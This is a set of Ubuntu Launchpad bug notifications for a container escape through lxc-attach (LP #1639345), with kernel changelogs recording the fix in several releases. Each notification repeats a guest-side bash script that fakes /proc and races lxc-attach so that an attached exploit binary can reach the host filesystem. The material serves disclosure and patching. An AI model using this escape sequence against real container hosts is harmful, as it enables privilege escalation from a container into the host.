[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.8.0-30.32
---
linux (4.8.0-30.32) yakkety; urgency=low
* CVE-2016-8655 (LP: #1646318)
- packet: fix race condition in packet_set_ring
-- Brad Figg Thu, 01 Dec 2016 08:02:53 -0800
** Changed in: linux (Ubuntu)
Status: Triaged => Fix Released
** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2016-8655
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
Fix Released
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Released
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Released
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Released
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Released
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat < /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description:Ubuntu 16.04.1 LTS
Release:16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.8.0-28.30 --- linux (4.8.0-28.30) yakkety; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1641083 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * [Feature] AVX-512 new instruction sets (avx512_4vnniw, avx512_4fmaps) (LP: #1637526) - x86/cpufeature: Add AVX512_4VNNIW and AVX512_4FMAPS features * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517) - SAUCE: (noup) Update zfs to 0.6.5.8-0ubuntu4.1 * Move some device drivers build from kernel built-in to modules (LP: #1637303) - [Config] CONFIG_TIGON3=m for all arches - [Config] CONFIG_VIRTIO_BLK=m, CONFIG_VIRTIO_NET=m * I2C touchpad does not work on AMD platform (LP: #1612006) - pinctrl/amd: Configure GPIO register using BIOS settings * guest experiencing Transmit Timeouts on CX4 (LP: #1636330) - powerpc/64: Re-fix race condition between going idle and entering guest - powerpc/64: Fix race condition in setting lock bit in idle/wakeup code * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554) - KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup * [Feature] KBL - New device ID for Kabypoint(KbP) (LP: #1591618) - SAUCE: mfd: lpss: Fix Intel Kaby Lake PCH-H properties * hio: SSD data corruption under stress test (LP: #1638700) - SAUCE: hio: set bi_error field to signal an I/O error on a BIO - SAUCE: hio: splitting bio in the entry of .make_request_fn * cleanup primary tree for linux-hwe layering issues (LP: #1637473) - [Config] switch Vcs-Git: to yakkety repository - [Packaging] handle both linux-lts* and linux-hwe* as backports - [Config] linux-tools-common and linux-cloud-tools-common are one per series - [Config] linux-source-* is in the primary linux namespace - [Config] linux-tools -- always suggest the base package * SRU: sync zfsutils-linux and spl-linux changes to linux (LP: #1635656) - SAUCE: (noup) Update spl to 0.6.5.8-2, zfs to 0.6.5.8-0ubuntu4 (LP: #1635656) * [Feature] SKX: perf uncore PMU support (LP: #1591810) - perf/x86/intel/uncore: Add Skylake server uncore support - perf/x86/intel/uncore: Remove hard-coded implementation for Node ID mapping location - perf/x86/intel/uncore: Handle non-standard counter offset * [Feature] Purley: Memory Protection Keys (LP: #1591804) - x86/pkeys: Add fault handling for PF_PK page fault bit - mm: Implement new pkey_mprotect() system call - x86/pkeys: Make mprotect_key() mask off additional vm_flags - x86/pkeys: Allocation/free syscalls - x86: Wire up protection keys system calls - generic syscalls: Wire up memory protection keys syscalls - pkeys: Add details of system call use to Documentation/ - x86/pkeys: Default to a restrictive init PKRU - x86/pkeys: Allow configuration of init_pkru - x86/pkeys: Add self-tests * kernel invalid opcode in intel_powerclamp (LP: #1630774) - SAUCE: (no-up) thermal/powerclamp: correct cpu support check * please include mlx5_core modules in linux-image-generic package (LP: #1635223) - [Config] Include mlx5 in main package * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733) - [Config] CONFIG_VFIO_PCI=y for ppc64el * Yakkety update to v4.8.6 stable release (LP: #1638748) - drm/vc4: Fix races when the CS reads from render targets. - drm/prime: Pass the right module owner through to dma_buf_export() - drm/i915/backlight: setup and cache pwm alternate increment value - drm/i915/backlight: setup backlight pwm alternate increment on backlight enable - drm/amdgpu: fix IB alignment for UVD - drm/amdgpu/dce10: disable hpd on local panels - drm/amdgpu/dce8: disable hpd on local panels - drm/amdgpu/dce11: disable hpd on local panels - drm/amdgpu/dce11: add missing drm_mode_config_cleanup call - drm/amdgpu: initialize the context reset_counter in amdgpu_ctx_init - drm/amdgpu: change vblank_time's calculation method to reduce computational error. - drm/radeon: narrow asic_init for virtualization - drm/radeon/si/dpm: fix phase shedding setup - drm/radeon: change vblank_time's calculation method to reduce computational error. - drm/vmwgfx: Limit the user-space command buffer size - drm/fsl-dcu: fix endian issue when using clk_register_divider - drm/amd/powerplay: fix mclk not switching back after multi-head was disabled - HID: add quirk for Akai MIDImix. - drm/i915/skl: Update plane watermarks atomically during plane updates - drm/i915: Move CRTC updating in atomic_commit into it's own hook - drm/i915/skl: Update DDB values atomi
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.4.0-51.72 --- linux (4.4.0-51.72) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1644611 * 4.4.0-1037-snapdragon #41: kernel panic on boot (LP: #1644596) - Revert "dma-mapping: introduce the DMA_ATTR_NO_WARN attribute" - Revert "powerpc: implement the DMA_ATTR_NO_WARN attribute" - Revert "nvme: use the DMA_ATTR_NO_WARN attribute" linux (4.4.0-50.71) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1644169 * xenial 4.4.0-49.70 kernel breaks LXD userspace (LP: #1644165) - Revert "UBUNTU: SAUCE: (namespace) fuse: Allow user namespace mounts by default" - Revert "UBUNTU: SAUCE: (namespace) fs: Don't remove suid for CAP_FSETID for userns root" - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Don't remove suid for CAP_FSETID in s_user_ns"" - Revert "UBUNTU: SAUCE: (namespace) fs: Allow superblock owner to change ownership of inodes" - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Allow superblock owner to change ownership of inodes with unmappable ids"" - Revert "UBUNTU: SAUCE: (namespace) security/integrity: Harden against malformed xattrs" - Revert "(namespace) Revert "UBUNTU: SAUCE: ima/evm: Allow root in s_user_ns to set xattrs"" - Revert "(namespace) dquot: For now explicitly don't support filesystems outside of init_user_ns" - Revert "(namespace) quota: Handle quota data stored in s_user_ns in quota_setxquota" - Revert "(namespace) quota: Ensure qids map to the filesystem" - Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Convert ids relative to s_user_ns"" - Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Require that qids passed to dqget() be valid and map into s_user_ns"" - Revert "(namespace) vfs: Don't create inodes with a uid or gid unknown to the vfs" - Revert "(namespace) vfs: Don't modify inodes with a uid or gid unknown to the vfs" - Revert "UBUNTU: SAUCE: (namespace) fuse: Translate ids in posix acl xattrs" - Revert "UBUNTU: SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to modules" - Revert "(namespace) vfs: Verify acls are valid within superblock's s_user_ns." - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle user namespace mounts"" - Revert "(namespace) fs: Refuse uid/gid changes which don't map into s_user_ns" - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't map into s_user_ns"" - Revert "(namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns" linux (4.4.0-49.70) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1640921 * Infiniband driver (kernel module) needed for Azure (LP: #1641139) - SAUCE: RDMA Infiniband for Windows Azure - [Config] CONFIG_HYPERV_INFINIBAND_ND=m - SAUCE: Makefile RDMA infiniband driver for Windows Azure - [Config] Add hv_network_direct.ko to generic inclusion list - SAUCE: RDMA Infiniband for Windows Azure is dependent on amd64 linux (4.4.0-48.69) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1640758 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * take 'P' command from upstream xmon (LP: #1637978) - powerpc/xmon: Add xmon command to dump process/task similar to ps(1) * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517) - SAUCE: (noup) Update zfs to 0.6.5.6-0ubuntu15 * I2C touchpad does not work on AMD platform (LP: #1612006) - pinctrl/amd: Configure GPIO register using BIOS settings - pinctrl/amd: switch to using a bool for level * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733) - [Config] CONFIG_VFIO_PCI=y for ppc64el * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554) - KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup * Allow fuse user namespace mounts by default in xenial (LP: #1634964) - (namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns - (namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't map into s_user_ns" - (namespace) fs: Refuse uid/gid changes which don't map into s_user_ns - (namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle user namespace mounts" - (namespace) vfs: Verify acls are valid within superblock's s_user_ns. - SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to modules - SAUCE: (namespace) fuse: Translate ids in posix acl xattrs - (namespace) vfs: Don't modify inodes with a uid or
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.19.0-75.83
---
linux (3.19.0-75.83) vivid; urgency=low
[ Luis Henriques ]
* Release Tracking Bug
- LP: #1640613
* lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
checks
* CVE-2016-8658
- brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()
* CVE-2016-7425
- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()
-- Luis Henriques Wed, 09 Nov 2016
22:48:56 +
** Changed in: linux (Ubuntu Vivid)
Status: Fix Committed => Fix Released
** Changed in: linux (Ubuntu Xenial)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
Triaged
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Released
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Released
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Released
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Released
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat < /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description:Ubuntu 16.04.1 LTS
Release:16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.13.0-103.150
---
linux (3.13.0-103.150) trusty; urgency=low
[ Luis Henriques ]
* Release Tracking Bug
- LP: #1644489
* Possible regression on 3.13.0-102.149~precise1 x86_64 (gce) (LP: #1644302)
- SAUCE: apparmor: delete extra variable dev_path
linux (3.13.0-102.149) trusty; urgency=low
[ Luis Henriques ]
* Release Tracking Bug
- LP: #1640581
* lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
checks
* Syntax error extra parenthesis linux-headers-3.13.0-100/Makefile
(LP: #1636625)
- Makefile: fix extra parenthesis typo when CC_STACKPROTECTOR_REGULAR is
enabled
* Add a driver for Amazon Elastic Network Adapters (ENA) (LP: #1635721)
- lib/bitmap.c: conversion routines to/from u32 array
- kernel.h: define u8, s8, u32, etc. limits
- net: ethtool: add new ETHTOOL_xLINKSETTINGS API
- PCI/MSI: Add pci_msix_vec_count()
- etherdevice: Use ether_addr_copy to copy an Ethernet address
- net: ena: Add a driver for Amazon Elastic Network Adapters (ENA)
- [config] enable CONFIG_ENA_ETHERNET=m (Amazon ENA driver)
* CVE-2016-8658
- brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()
* CVE-2016-7425
- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()
* srcname from mount rule corrupted under load (LP: #1634753)
- SAUCE: apparmor: fix sleep in critical section
* ghash-clmulni-intel module fails to load (LP: #1633058)
- crypto: ghash-clmulni - Fix load failure
- crypto: cryptd - Assign statesize properly
-- Luis Henriques Thu, 24 Nov 2016
09:56:54 +
** Changed in: linux (Ubuntu Trusty)
Status: Fix Committed => Fix Released
** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2016-7425
** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2016-8658
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
Triaged
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Released
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Released
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Released
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Committed
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat < /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description:Ubuntu 16.04.1 LTS
Release:16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
P
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Changed in: linux (Ubuntu)
Status: Incomplete => Triaged
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
Triaged
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Committed
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Committed
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Committed
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat < /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description:Ubuntu 16.04.1 LTS
Release:16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Changed in: linux (Ubuntu)
Status: Incomplete => New
** Tags added: bot-stop-nagging
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
New
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Committed
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Committed
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Committed
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat < /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description:Ubuntu 16.04.1 LTS
Release:16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
New
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Committed
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Committed
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Committed
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat < /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description:Ubuntu 16.04.1 LTS
Release:16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
